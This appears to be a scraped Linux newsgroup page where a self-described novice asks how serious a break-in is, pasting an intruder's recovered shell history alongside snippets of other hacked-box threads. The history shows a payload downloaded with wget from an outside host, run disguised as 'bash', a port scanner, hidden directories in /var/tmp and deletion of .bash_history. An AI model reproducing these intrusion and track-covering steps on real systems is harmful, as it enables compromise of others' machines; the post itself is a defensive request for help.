odd cron job using access.log by testuser
You are in a race. As quickly as you fix the cracker can undo your fix. At least take it off the net for a while while you fix the cracks. As a minimal...
Uh oh. I think I know what's going on, but in my inexperience, it's only a guess. I could use some confirmation and opinions regarding extent of the damage. I looked inhome-testuser at the .bashhistory and found the following:
I recently just had a FC2 box hacked. Unfortunately we simply can't take it offline at the moment because we have outside people needing to use files on it. I'm...
Maybe you've got a specially built Linux installation where pbuttwd(8) is a statically linked binary that just...
w ps -x cd-tmp-." ";ls -aF cd w00t;ls wc -l 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15.t .. snip .. 183.txt 184.txt 185.txt 186.txt 187.txt rm .bashhistory cd rm .bashhistory exit w ps -x cd-tmp-." "-w00t;ls exit w ps -x cd-tmp-." ";ls -aF cd w00t;ls wc -l 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15. .. snip .. txt 254.txt 255.txt cat 0.txt clear ls ls wc -l uniq.txt cat 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15.txt .. snip .. txt 239.txt 240.txt 241.txt 242.txt 243.txt 244.txt 245.txt 246.txt 247.txt 248.txt 249.txt 250.txt 251.txt wc -l uniq.txt rm 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15.txt .. snip .. 245.txt 246.txt 247.txt 248.txt 249.txt 250.txt 251.txt 252.txt 253.txt 254.txt 255.txt ls wc -l uniq.txt ls .-eigei 100 & ps -x ls exit ps -x exit w ps -x cd-tmp-." ";ls -af cd w00t;ls cat vuln.txt wc -l vuln.txt ps -x exit w ps -x cd-tmp-." "-woot;ls cd-tmp-." "-w00t;ls cat vuln.txt mv 0 pscan2;ls wc -l uniq.txt .-eigei 100 & exit w ps -x cat-tmp-." "-w00t-vuln.txt ls-tmp-." "-w00t exit w ps x kill -9 31257 31256 pbuttwd sbin-ifconfig grep inet catproc-cpuinfo w uname -a w ps x catproc-cpuinfo w ps x catproc-cpuinfo w ps x catproc-cpuinfo ls -a cdvar-tmp ls -a mkdir ." " cd ." " ls -a tar zxvf omar.tar.gz rm -rf omar.tar.gz cd .f mv x bash export PATH="." bash w ps x ls -a catproc-cpuinfo ls - a ls -a cdvar-tmp ls -a cd ." " ls -a cd .f ls -a export PATH="." bash w ps x catproc-cpuinfo w ps x cdvar-tmp ls -a cd ." " ls -a catetc-hosts catproc-cpuinfo ls-a cd .f ls -a export PATH="." bash w ps x cdvart-emp ls -acdvar-tmp ls -a cdvar-tmp ls -a catetc-hosts ls -a rm -rf ." " sbin-ifconfig -a grep inet catproc-cpuinfo ls- a ls- a wget archive.lydo.org-omar1.tgz tar zxvf omar1.tgz rm -rf omar1.tgz cd .f mv x bash .-bash ps x kill -9 2591 export PATH="." bash
I think that's what happened. Pretty sure. I'm pretty newbie with Linux security, but the following seems pretty obvious to me. I guess I could use some suggestions regarding how serious this is...
Linux groups from Newsgroups